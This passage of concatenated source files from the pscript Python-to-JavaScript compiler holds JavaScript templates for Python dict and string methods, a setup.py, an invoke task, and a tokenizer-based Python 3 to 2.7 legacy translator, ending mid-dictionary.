start = Math.max(0, ((start < 0) ? this.length + start : start));
stop = Math.min(this.length, ((stop < 0) ? this.length + stop : stop));
if (Array.isArray(this)) {
for (var i=start; i<stop; i++) {
if (FUNCTION_PREFIXop_equals(this[i], x)) {return i;} // indexOf cant
}
} else if (this.constructor === String) {
var i = this.slice(start, stop).indexOf(x);
if (i >= 0) return i + start;
} else return this.KEY.apply(this, arguments);
var e = Error(x); e.name='ValueError'; throw e;
}"""
## Dict only
# note: fromkeys is a classmethod, and we don't support it.
METHODS['get'] = """function (key, d) { // nargs: 1 2
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
if (this[key] !== undefined) {return this[key];}
else if (d !== undefined) {return d;}
else {return null;}
}"""
METHODS['items'] = """function () { // nargs: 0
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
var key, keys = Object.keys(this), res = []
for (var i=0; i<keys.length; i++) {key = keys[i]; res.push([key, this[key]]);}
return res;
}"""
METHODS['keys'] = """function () { // nargs: 0
if (typeof this['KEY'] === 'function') return this.KEY.apply(this, arguments);
return Object.keys(this);
}"""
METHODS['popitem'] = """function () { // nargs: 0
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
var keys, key, val;
keys = Object.keys(this);
if (keys.length == 0) {var e = Error(); e.name='KeyError'; throw e;}
key = keys[0]; val = this[key]; delete this[key];
return [key, val];
}"""
METHODS['setdefault'] = """function (key, d) { // nargs: 1 2
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
if (this[key] !== undefined) {return this[key];}
else if (d !== undefined) { this[key] = d; return d;}
else {return null;}
}"""
METHODS['update'] = """function (other) { // nargs: 1
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
var key, keys = Object.keys(other);
for (var i=0; i<keys.length; i++) {key = keys[i]; this[key] = other[key];}
return null;
}"""
METHODS['values'] = """function () { // nargs: 0
if (this.constructor !== Object) return this.KEY.apply(this, arguments);
var key, keys = Object.keys(this), res = [];
for (var i=0; i<keys.length; i++) {key = keys[i]; res.push(this[key]);}
return res;
}"""
## String only
# ignores: encode, decode, format_map, isprintable, maketrans
# Not a Python method, but a method that we need, and is only ECMA 6
# http://stackoverflow.com/a/5450113/2271927
METHODS['repeat'] = """function(count) { // nargs: 0
if (this.repeat) return this.repeat(count);
if (count < 1) return '';
var result = '', pattern = this.valueOf();
while (count > 1) {
if (count & 1) result += pattern;
count >>= 1, pattern += pattern;
}
return result + pattern;
}"""
METHODS['capitalize'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.slice(0, 1).toUpperCase() + this.slice(1).toLowerCase();
}"""
METHODS['casefold'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.toLowerCase();
}"""
METHODS['center'] = """function (w, fill) { // nargs: 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
fill = (fill === undefined) ? ' ' : fill;
var tofill = Math.max(0, w - this.length);
var left = Math.ceil(tofill / 2);
var right = tofill - left;
return METHOD_PREFIXrepeat(fill, left) + this + METHOD_PREFIXrepeat(fill, right);
}"""
METHODS['endswith'] = """function (x) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var last_index = this.lastIndexOf(x);
return last_index == this.length - x.length && last_index >= 0;
}"""
METHODS['expandtabs'] = """function (tabsize) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
tabsize = (tabsize === undefined) ? 8 : tabsize;
return this.replace(/\\t/g, METHOD_PREFIXrepeat(' ', tabsize));
}"""
METHODS['find'] = """function (x, start, stop) { // nargs: 1 2 3
if (this.constructor !== String) return this.KEY.apply(this, arguments);
start = (start === undefined) ? 0 : start;
stop = (stop === undefined) ? this.length : stop;
start = Math.max(0, ((start < 0) ? this.length + start : start));
stop = Math.min(this.length, ((stop < 0) ? this.length + stop : stop));
var i = this.slice(start, stop).indexOf(x);
if (i >= 0) return i + start;
return -1;
}"""
METHODS['format'] = """function () {
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var parts = [], i = 0, i1, i2;
var itemnr = -1;
while (i < this.length) {
// find opening
i1 = this.indexOf('{', i);
if (i1 < 0 || i1 == this.length-1) { break; }
if (this[i1+1] == '{') {parts.push(this.slice(i, i1+1)); i = i1 + 2; continue;}
// find closing
i2 = this.indexOf('}', i1);
if (i2 < 0) { break; }
// parse
itemnr += 1;
var fmt = this.slice(i1+1, i2);
var index = fmt.split(':')[0].split('!')[0];
index = index? Number(index) : itemnr
var s = FUNCTION_PREFIXformat(arguments[index], fmt);
parts.push(this.slice(i, i1), s);
i = i2 + 1;
}
parts.push(this.slice(i));
return parts.join('');
}"""
METHODS['isalnum'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^[A-Za-z0-9]+$/.test(this));
}"""
METHODS['isalpha'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^[A-Za-z]+$/.test(this));
}"""
METHODS['isidentifier'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^[A-Za-z_][A-Za-z0-9_]*$/.test(this));
}"""
METHODS['islower'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var low = this.toLowerCase(), high = this.toUpperCase();
return low != high && low == this;
}"""
METHODS['isdecimal'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^[0-9]+$/.test(this));
}"""
# The thing about isdecimal, isdigit and isnumeric.
# https://stackoverflow.com/a/36800319/2271927
#
# * isdecimal() (Only Decimal Numbers)
# * str.isdigit() (Decimals, Subscripts, Superscripts)
# * isnumeric() (Digits, Vulgar Fractions, Subscripts, Superscripts,
# Roman Numerals, Currency Numerators)
#
# In other words, isdecimal is the most strict. We used to have
# isnumeric with isdecimal's implementation, so we provide isnumeric
# and isdigit as aliases for now.
METHODS['isnumeric'] = METHODS['isdigit'] = METHODS['isdecimal']
METHODS['isspace'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return Boolean(/^\\s+$/.test(this));
}"""
METHODS['istitle'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var low = this.toLowerCase(), title = METHOD_PREFIXtitle(this);
return low != title && title == this;
}"""
METHODS['isupper'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var low = this.toLowerCase(), high = this.toUpperCase();
return low != high && high == this;
}"""
METHODS['join'] = """function (x) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return x.join(this); // call join on the list instead of the string.
}"""
METHODS['ljust'] = """function (w, fill) { // nargs: 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
fill = (fill === undefined) ? ' ' : fill;
var tofill = Math.max(0, w - this.length);
return this + METHOD_PREFIXrepeat(fill, tofill);
}"""
METHODS['lower'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.toLowerCase();
}"""
METHODS['lstrip'] = """function (chars) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
chars = (chars === undefined) ? ' \\t\\r\\n' : chars;
for (var i=0; i<this.length; i++) {
if (chars.indexOf(this[i]) < 0) return this.slice(i);
} return '';
}"""
METHODS['partition'] = """function (sep) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
if (sep === '') {var e = Error('empty sep'); e.name='ValueError'; throw e;}
var i1 = this.indexOf(sep);
if (i1 < 0) return [this.slice(0), '', '']
var i2 = i1 + sep.length;
return [this.slice(0, i1), this.slice(i1, i2), this.slice(i2)];
}"""
METHODS['replace'] = """function (s1, s2, count) { // nargs: 2 3
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var i = 0, i2, parts = [];
count = (count === undefined) ? 1e20 : count;
while (count > 0) {
i2 = this.indexOf(s1, i);
if (i2 >= 0) {
parts.push(this.slice(i, i2));
parts.push(s2);
i = i2 + s1.length;
count -= 1;
} else break;
}
parts.push(this.slice(i));
return parts.join('');
}"""
METHODS['rfind'] = """function (x, start, stop) { // nargs: 1 2 3
if (this.constructor !== String) return this.KEY.apply(this, arguments);
start = (start === undefined) ? 0 : start;
stop = (stop === undefined) ? this.length : stop;
start = Math.max(0, ((start < 0) ? this.length + start : start));
stop = Math.min(this.length, ((stop < 0) ? this.length + stop : stop));
var i = this.slice(start, stop).lastIndexOf(x);
if (i >= 0) return i + start;
return -1;
}"""
METHODS['rindex'] = """function (x, start, stop) { // nargs: 1 2 3
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var i = METHOD_PREFIXrfind(this, x, start, stop);
if (i >= 0) return i;
var e = Error(x); e.name='ValueError'; throw e;
}"""
METHODS['rjust'] = """function (w, fill) { // nargs: 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
fill = (fill === undefined) ? ' ' : fill;
var tofill = Math.max(0, w - this.length);
return METHOD_PREFIXrepeat(fill, tofill) + this;
}"""
METHODS['rpartition'] = """function (sep) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
if (sep === '') {var e = Error('empty sep'); e.name='ValueError'; throw e;}
var i1 = this.lastIndexOf(sep);
if (i1 < 0) return ['', '', this.slice(0)]
var i2 = i1 + sep.length;
return [this.slice(0, i1), this.slice(i1, i2), this.slice(i2)];
}"""
METHODS['rsplit'] = """function (sep, count) { // nargs: 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
sep = (sep === undefined) ? /\\s/ : sep;
count = Math.max(0, (count === undefined) ? 1e20 : count);
var parts = this.split(sep);
var limit = Math.max(0, parts.length-count);
var res = parts.slice(limit);
if (count < parts.length) res.splice(0, 0, parts.slice(0, limit).join(sep));
return res;
}"""
METHODS['rstrip'] = """function (chars) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
chars = (chars === undefined) ? ' \\t\\r\\n' : chars;
for (var i=this.length-1; i>=0; i--) {
if (chars.indexOf(this[i]) < 0) return this.slice(0, i+1);
} return '';
}"""
METHODS['split'] = """function (sep, count) { // nargs: 0, 1 2
if (this.constructor !== String) return this.KEY.apply(this, arguments);
if (sep === '') {var e = Error('empty sep'); e.name='ValueError'; throw e;}
sep = (sep === undefined) ? /\\s/ : sep;
if (count === undefined) { return this.split(sep); }
var res = [], i = 0, index1 = 0, index2 = 0;
while (i < count && index1 < this.length) {
index2 = this.indexOf(sep, index1);
if (index2 < 0) { break; }
res.push(this.slice(index1, index2));
index1 = index2 + sep.length || 1;
i += 1;
}
res.push(this.slice(index1));
return res;
}"""
METHODS['splitlines'] = """function (keepends) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
keepends = keepends ? 1 : 0
var finder = /\\r\\n|\\r|\\n/g;
var i = 0, i2, isrn, parts = [];
while (finder.exec(this) !== null) {
i2 = finder.lastIndex -1;
isrn = i2 > 0 && this[i2-1] == '\\r' && this[i2] == '\\n';
if (keepends) parts.push(this.slice(i, finder.lastIndex));
else parts.push(this.slice(i, i2 - isrn));
i = finder.lastIndex;
}
if (i < this.length) parts.push(this.slice(i));
else if (!parts.length) parts.push('');
return parts;
}"""
METHODS['startswith'] = """function (x) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.indexOf(x) == 0;
}"""
METHODS['strip'] = """function (chars) { // nargs: 0 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
chars = (chars === undefined) ? ' \\t\\r\\n' : chars;
var i, s1 = this, s2 = '', s3 = '';
for (i=0; i<s1.length; i++) {
if (chars.indexOf(s1[i]) < 0) {s2 = s1.slice(i); break;}
} for (i=s2.length-1; i>=0; i--) {
if (chars.indexOf(s2[i]) < 0) {s3 = s2.slice(0, i+1); break;}
} return s3;
}"""
METHODS['swapcase'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var c, res = [];
for (var i=0; i<this.length; i++) {
c = this[i];
if (c.toUpperCase() == c) res.push(c.toLowerCase());
else res.push(c.toUpperCase());
} return res.join('');
}"""
METHODS['title'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var i0, res = [], tester = /^[^A-Za-z]?[A-Za-z]$/;
for (var i=0; i<this.length; i++) {
i0 = Math.max(0, i-1);
if (tester.test(this.slice(i0, i+1))) res.push(this[i].toUpperCase());
else res.push(this[i].toLowerCase());
} return res.join('');
}"""
METHODS['translate'] = """function (table) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
var c, res = [];
for (var i=0; i<this.length; i++) {
c = table[this[i]];
if (c === undefined) res.push(this[i]);
else if (c !== null) res.push(c);
} return res.join('');
}"""
METHODS['upper'] = """function () { // nargs: 0
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return this.toUpperCase();
}"""
METHODS['zfill'] = """function (width) { // nargs: 1
if (this.constructor !== String) return this.KEY.apply(this, arguments);
return METHOD_PREFIXrjust(this, width, '0');
}"""
for key in METHODS:
METHODS[key] = re.subn(r'METHOD_PREFIX(.+?)\(',
r'METHOD_PREFIX\1.call(', METHODS[key])[0]
METHODS[key] = METHODS[key].replace(
'KEY', key).replace(
'FUNCTION_PREFIX', FUNCTION_PREFIX).replace(
'METHOD_PREFIX', METHOD_PREFIX).replace(
', )', ')')
for key in FUNCTIONS:
FUNCTIONS[key] = re.subn(r'METHOD_PREFIX(.+?)\(',
r'METHOD_PREFIX\1.call(', FUNCTIONS[key])[0]
FUNCTIONS[key] = FUNCTIONS[key].replace(
'KEY', key).replace(
'FUNCTION_PREFIX', FUNCTION_PREFIX).replace(
'METHOD_PREFIX', METHOD_PREFIX)
```
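A short, hedged sketch of how the helpers above are meant to be used together: `get_std_info` inspects one stdlib entry for its argument counts and dependencies, and `get_partial_std_lib` emits just the JavaScript definitions needed for a given set of names. The import path follows the file location shown above but may differ between pscript versions:
```python
# Hedged usage sketch for the stdlib helpers above; the exact output
# format may vary between pscript versions.
from pscript.stdlib import FUNCTIONS, get_partial_std_lib, get_std_info

# Argument counts and the other stdlib entries this function depends on.
nargs, func_deps, method_deps = get_std_info(FUNCTIONS['sorted'])
print(nargs, func_deps, method_deps)

# JavaScript source for just these functions/methods, indented one level.
js = get_partial_std_lib(['sorted', 'truthy'], ['sort'], indent=1)
print(js)
```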
#### File: JesusZerpa/pscript/setup.py
```python
import os
import shutil
try:
import setuptools # noqa, analysis:ignore
except ImportError:
pass # setuptools allows for "develop", but it's not essential
from distutils.core import setup
## Function we need
def get_version_and_doc(filename):
NS = dict(__version__='', __doc__='')
docStatus = 0 # Not started, in progress, done
for line in open(filename, 'rb').read().decode().splitlines():
if line.startswith('__version__'):
exec(line.strip(), NS, NS)
elif line.startswith('"""'):
if docStatus == 0:
docStatus = 1
line = line.lstrip('"')
elif docStatus == 1:
docStatus = 2
if docStatus == 1:
NS['__doc__'] += line.rstrip() + '\n'
if not NS['__version__']:
raise RuntimeError('Could not find __version__')
return NS['__version__'], NS['__doc__']
def package_tree(pkgroot):
subdirs = [os.path.relpath(i[0], THIS_DIR).replace(os.path.sep, '.')
for i in os.walk(os.path.join(THIS_DIR, pkgroot))
if '__init__.py' in i[2]]
return subdirs
def copy_for_legacy_python(src_dir, dest_dir):
from translate_to_legacy import LegacyPythonTranslator
# Dirs and files to explicitly not translate
skip = ['tests/python_sample.py',
'tests/python_sample2.py',
'tests/python_sample3.py']
# Make a fresh copy of the package
if os.path.isdir(dest_dir):
shutil.rmtree(dest_dir)
ignore = lambda src, names: [n for n in names if n == '__pycache__']
shutil.copytree(src_dir, dest_dir, ignore=ignore)
# Translate in-place
LegacyPythonTranslator.translate_dir(dest_dir, skip=skip)
## Collect info for setup()
THIS_DIR = os.path.dirname(__file__)
# Define name and description
name = 'pscript'
description = "Python to JavaScript compiler."
# Get version and docstring (i.e. long description)
version, doc = get_version_and_doc(os.path.join(THIS_DIR, name, '__init__.py'))
doc = "" # won't render open(os.path.join(THIS_DIR, 'README.md'), "rb").read().decode()
# Support for legacy Python: we install a second package with the
# translated code. We generate that code when we can. We use
# "name_legacy" below in "packages", "package_dir", and "package_data".
name_legacy = name + '_legacy'
if os.path.isfile(os.path.join(THIS_DIR, 'translate_to_legacy.py')):
copy_for_legacy_python(os.path.join(THIS_DIR, name),
os.path.join(THIS_DIR, name_legacy))
## Setup
setup(
name=name,
version=version,
author='<NAME> and contributors',
author_email='<EMAIL>',
license='(new) BSD',
url='http://pscript.readthedocs.io',
download_url='https://pypi.python.org/pypi/pscript',
keywords="Python, JavaScript, compiler, transpiler",
description=description,
long_description=doc,
long_description_content_type="text/markdown",
platforms='any',
provides=[name],
install_requires=[],
packages=package_tree(name) + package_tree(name_legacy),
package_dir={name: name, name_legacy: name_legacy},
# entry_points={'console_scripts': ['pscript = pscript.__main__:main'], },
zip_safe=True,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
)
```
#### File: pscript/tasks/pscript.py
```python
from invoke import task
# todo: also print meta info like globals etc.
@task(help=dict(code='the Python code to transpile'))
def py2js(ctx, code):
"""transpile given Python code to JavaScript
"""
from pscript import py2js
print(py2js(code))
```
#### File: JesusZerpa/pscript/translate_to_legacy.py
```python
from __future__ import print_function
import os
import re
# List of fixers from lib3to2: absimport annotations bitlength bool
# bytes classdecorator collections dctsetcomp division except features
# fullargspec funcattrs getcwd imports imports2 input int intern
# itertools kwargs memoryview metaclass methodattrs newstyle next
# numliterals open print printfunction raise range reduce setliteral
# str super throw unittest unpacking with
ALPHANUM = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
KEYWORDS = set(['False', 'None', 'True', 'and', 'as', 'assert', 'break',
'class', 'continue', 'def', 'del', 'elif', 'else', 'except',
'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is',
'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return',
'try', 'while', 'with', 'yield'])
# This regexp is used to find the tokens
tokenProg = re.compile(
'(#)|' + # Comment or
'(' + # Begin of string group (group 1)
'[bB]?[uU]?[rR]?' + # Possibly bytes, unicode, raw
'("""|\'\'\'|"|\')' + # String start (triple qoutes first, group 3)
')|' + # End of string group
'([' + ALPHANUM + '_]+)' # Identifiers/numbers (group 4) or
)
# regexps to find the end of a comment or string
endProgs = {
"#": re.compile(r"\r?\n"),
"'": re.compile(r"([^\\])(\\\\)*'"),
'"': re.compile(r'([^\\])(\\\\)*"'),
"'''": re.compile(r"([^\\])(\\\\)*'''"),
'"""': re.compile(r'([^\\])(\\\\)*"""'),
}
class CancelTranslation(RuntimeError):
pass # to cancel a translation
class Token:
""" A token in the source code. The type of token can be a comment,
string, keyword, number or identifier. It has functionality to get
information on neighboring tokens and neighboring characters. This
should be enough to do all necessary translations.
If the ``fix`` attribute is set, that string will replace the
current string.
"""
def __init__(self, total_text, type, start, end):
self.total_text = total_text
self.type = type
self.start = start
self.end = end
self.fix = None
def __repr__(self):
return '<token %r>' % self.text
def find_forward(self, s):
""" Find the position of a character to the right.
"""
return self.total_text.find(s, self.end)
def find_backward(self, s):
""" Find the position of a character to the left.
"""
return self.total_text.rfind(s, 0, self.start)
@property
def text(self):
""" The original text of the token.
"""
return self.total_text[self.start:self.end]
@property
def prev_char(self):
""" The first non-whitespace char to the left of this token
that is still on the same line.
"""
i = self.find_backward('\n')
i = i if i >= 0 else 0
line = self.total_text[i:self.start]
line = re.sub(r"\s+", '', line) # remove whitespace
return line[-1:] # return single char or empty string
@property
def next_char(self):
""" Get the first non-whitespace char to the right of this token
that is still on the same line.
"""
i = self.find_forward('\n')
i = i if i >= 0 else len(self.total_text)
line = self.total_text[self.end:i]
line = re.sub(r"\s+", '', line) # remove whitespace
return line[:1] # return single char or empty string
@property
def indentation(self):
""" The number of chars that the current line uses for indentation.
"""
i = max(0, self.find_backward('\n'))
line1 = self.total_text[i+1:self.start]
line2 = line1.lstrip()
return len(line1) - len(line2)
@property
def line_tokens(self):
""" All (non-comment) tokens that are on the same line.
"""
i1, i2 = self.find_backward('\n'), self.find_forward('\n')
i1 = i1 if i1 >= 0 else 0
i2 = i2 if i2 >= 0 else len(self.total_text)
t = self
tokens = []
while t.prev_token and t.prev_token.start >= i1:
t = t.prev_token
tokens.append(t)
while (t.next_token and t.next_token.end <= i2 and
t.next_token.type != 'comment'):
t = t.next_token
tokens.append(t)
return tokens
class BaseTranslator:
""" Translate Python code. One translator instance is used to
translate one file.
"""
def __init__(self, text):
self._text = text
self._tokens = None
@property
def tokens(self):
""" The list of tokens.
"""
if self._tokens is None:
self._parse()
return self._tokens
def _parse(self):
""" Generate tokens by parsing the code.
"""
self._tokens = []
pos = 0
# Find tokens
while True:
token = self._find_next_token(pos)
if token is None:
break
self._tokens.append(token)
pos = token.end
# Link tokens
if self._tokens:
self._tokens[0].prev_token = None
self._tokens[len(self._tokens)-1].next_token = None
for i in range(0, len(self._tokens)-1):
self._tokens[i].next_token = self._tokens[i+1]
for i in range(1, len(self._tokens)):
self._tokens[i].prev_token = self._tokens[i-1]
def _find_next_token(self, pos):
""" Returns a token or None if no new tokens can be found.
"""
text = self._text
# Init tokens, if pos too large, we're done
if pos > len(text):
return None
# Find the start of the next string or comment
match = tokenProg.search(text, pos)
if not match:
return None
if match.group(1):
# Comment
start = match.start()
end_match = endProgs['#'].search(text, start+1)
end = end_match.start() if end_match else len(text)
return Token(text, 'comment', start, end)
elif match.group(2) is not None:
# String - we start the search for the end-char(s) at end-1,
# because our regexp has to allow for one char (which is
# not backslash) before the end char(s).
start = match.start()
string_style = match.group(3)
end = endProgs[string_style].search(text, match.end() - 1).end()
return Token(text, 'string', start, end)
else:
# Identifier ("a word or number") Find out whether it is a key word
identifier = match.group(4)
tokenArgs = match.start(), match.end()
if identifier in KEYWORDS:
return Token(text, 'keyword', *tokenArgs)
elif identifier[0] in '0123456789':
return Token(text, 'number', *tokenArgs)
else:
return Token(text, 'identifier', *tokenArgs)
def translate(self):
""" Translate the code by applying fixes to the tokens. Returns
the new code as a string.
"""
# Collect fixers. Sort by name, so at least its consistent.
fixers = []
for name in sorted(dir(self)):
if name.startswith('fix_'):
fixers.append(getattr(self, name))
# Apply fixers
new_tokens = []
for i, token in enumerate(self.tokens):
for fixer in fixers:
new_token = fixer(token)
if isinstance(new_token, Token):
assert new_token.start == new_token.end
if new_token.start <= token.start:
new_tokens.append((i, new_token))
else:
new_tokens.append((i+1, new_token))
# Insert new tokens
for i, new_token in reversed(new_tokens):
self._tokens.insert(i, new_token)
return self.dumps()
def dumps(self):
""" Return a string with the translated code.
"""
text = self._text
pos = len(self._text)
pieces = []
for t in reversed(self.tokens):
pieces.append(text[t.end:pos])
pieces.append(t.fix if t.fix is not None else t.text)
pos = t.start
pieces.append(text[:pos])
return ''.join(reversed(pieces))
@classmethod
def translate_dir(cls, dirname, skip=()):
""" Classmethod to translate all .py files in the given
directory and its subdirectories. Skips files that match names
in skip (which can be full file names, absolute paths, and paths
relative to dirname). Any file that imports 'print_function'
from __future__ is cancelled.
"""
dirname = os.path.normpath(dirname)
skip = [os.path.normpath(p) for p in skip]
for root, dirs, files in os.walk(dirname):
for fname in files:
if fname.endswith('.py'):
filename = os.path.join(root, fname)
relpath = os.path.relpath(filename, dirname)
if fname in skip or relpath in skip or filename in skip:
print('%s skipped: %r' % (cls.__name__, relpath))
continue
code = open(filename, 'rb').read().decode('utf-8')
try:
new_code = cls(code).translate()
except CancelTranslation:
print('%s cancelled: %r' % (cls.__name__, relpath))
else:
with open(filename, 'wb') as f:
f.write(new_code.encode('utf-8'))
print('%s translated: %r' % (cls.__name__, relpath))
class LegacyPythonTranslator(BaseTranslator):
""" A Translator to translate Python 3 to Python 2.7.
"""
FUTURES = ('print_function', 'absolute_import', 'with_statement',
'unicode_literals', 'division')
def dumps(self):
return '# -*- coding: utf-8 -*-\n' + BaseTranslator.dumps(self)
def fix_cancel(self, token):
""" Cancel translation if using `from __future__ import xxx`
"""
if token.type == 'keyword' and (token.text == 'from' and
token.next_token.text == '__future__'):
for future in self.FUTURES:
if any([t.text == future for t in token.line_tokens]):
# Assume this module is already Python 2.7 compatible
raise CancelTranslation()
def fix_future(self, token):
""" Fix print_function, absolute_import, with_statement.
"""
status = getattr(self, '_future_status', 0)
if status == 2:
return # Done
if status == 0 and token.type == 'string':
self._future_status = 1 # docstring
elif token.type != 'comment':
self._future_status = 2 # done
i = max(0, token.find_backward('\n'))
t = Token(token.total_text, '', i, i)
t.fix = '\nfrom __future__ import %s\n' % (', '.join(self.FUTURES))
return t
def fix_newstyle(self, token):
""" Fix to always use new style classes.
"""
if token.type == 'keyword' and token.text == 'class':
nametoken = token.next_token
if nametoken.next_char != '(':
nametoken.fix = '%s(object)' % nametoken.text
def fix_super(self, token):
""" Fix super() -> super(Cls, self)
"""
# First keep track of the current class
if token.type == 'keyword':
if token.text == 'class':
self._current_class = token.indentation, token.next_token.text
elif token.text == 'def':
indent, name = getattr(self, '_current_class', (0, ''))
if token.indentation <= indent:
self._current_class = 0, ''
# Then check for super
if token.type == 'identifier' and token.text == 'super':
if token.prev_char != '.' and token.next_char == '(':
i = token.find_forward(')')
sub = token.total_text[token.end:i+1]
if re.sub(r"\s+", '', sub) == '()':
indent, name = getattr(self, '_current_class', (0, ''))
if name:
token.end = i + 1
token.fix = 'super(%s, self)' % name
# Note: we use "from __future__ import unicode_literals"
# def fix_unicode_literals(self, token):
# if token.type == 'string':
# if token.text.lstrip('r').startswith(('"', "'")): # i.e. no b/u
# token.fix = 'u' + token.text
def fix_unicode(self, token):
if token.type == 'identifier':
if token.text == 'chr' and token.next_char == '(':
# Calling chr
token.fix = 'unichr'
elif token.text == 'str' and token.next_char == '(':
# Calling str
token.fix = 'unicode'
elif token.text == 'str' and (token.next_char == ')' and
token.prev_char == '(' and
token.line_tokens[0].text == 'class'):
token.fix = 'unicode'
elif token.text == 'isinstance' and token.next_char == '(':
# Check for usage of str in isinstance
end = token.find_forward(')')
t = token.next_token
while t.next_token and t.next_token.start < end:
t = t.next_token
if t.text == 'str':
t.fix = 'basestring'
def fix_range(self, token):
if token.type == 'identifier' and token.text == 'range':
if token.next_char == '(' and token.prev_char != '.':
token.fix = 'xrange'
def fix_encode(self, token):
if token.type == 'identifier' and token.text in('encode', 'decode'):
if token.next_char == '(' and token.prev_char == '.':
end = token.find_forward(')')
if not (token.next_token and token.next_token.start < end):
token.fix = token.text + '("utf-8")'
token.end = end + 1
def fix_getcwd(self, token):
""" Fix os.getcwd -> os.getcwdu
"""
if token.type == 'identifier' and token.text == 'getcwd':
if token.next_char == '(':
token.fix = 'getcwdu'
def fix_imports(self, token):
""" import xx.yy -> import zz
"""
if token.type == 'keyword' and token.text == 'import':
tokens = token.line_tokens
# For each import case ...
for name, replacement in self.IMPORT_MAPPING.items():
parts = name.split('.')
# Walk over tokens to find start of match
for i in range(len(tokens)):
if (tokens[i].text == parts[0] and
len(tokens[i:]) >= len(parts)):
# Is it a complete match?
for j, part in enumerate(parts):
if tokens[i+j].text != part:
break
else:
# Match, merge tokens
tokens[i].end = tokens[i+len(parts)-1].end
tokens[i].fix = replacement
for j in range(1, len(parts)):
tokens[i+j].start = tokens[i].end
tokens[i+j].end = tokens[i].end
tokens[i+j].fix = ''
break # we have found the match
def fix_imports2(self, token):
""" from xx.yy import zz -> from vv import zz
"""
if token.type == 'keyword' and token.text == 'import':
tokens = token.line_tokens
# We use the fact that all imports keys consist of two names
if tokens[0].text == 'from' and len(tokens) == 5:
if tokens[3].text == 'import':
xxyy = tokens[1].text + '.' + tokens[2].text
name = tokens[4].text
if xxyy in self.IMPORT_MAPPING2:
for possible_module in self.IMPORT_MAPPING2[xxyy]:
if name in self.PY2MODULES[possible_module]:
tokens[1].fix = possible_module
tokens[1].end = tokens[2].end
tokens[2].start = tokens[2].end
break
# Map simple Python 3 import paths to their legacy (Python 2) counterparts
IMPORT_MAPPING = {
"reprlib": "repr",
"winreg": "_winreg",
"configparser": "ConfigParser",
"copyreg": "copy_reg",
"queue": "Queue",
"socketserver": "SocketServer",
"_markupbase": "markupbase",
"test.support": "test.test_support",
"dbm.bsd": "dbhash",
"dbm.ndbm": "dbm",
"dbm.dumb": "dumbdbm",
"dbm.gnu": "gdbm",
"html.parser": "HTMLParser",
"html.entities": "htmlentitydefs",
"http.client": "httplib",
"http.cookies": "Cookie",
"http.cookiejar": "cookielib",
"urllib.robotparser": "robotparser",
"xmlrpc.client": "xmlrpclib",
"builtins": "__builtin__",
}
# Map Python 3 import paths to a tuple of candidate legacy (Python 2) modules
IMPORT_MAPPING2 = {
'urllib.request': ('urllib2', 'urllib'),
'urllib.error': ('urllib2', 'urllib'),
'urllib.parse': ('urllib2', 'urllib', 'urlparse'),
'dbm.__init__': ('anydbm', 'whichdb'),
'http.server': ('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),
'xmlrpc.server': ('DocXMLRPCServer', 'SimpleXMLRPCServer'),
}
# This defines what names are in specific Python 2 modules
PY2MODULES = {
'urllib2' : (
'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',
'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',
'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',
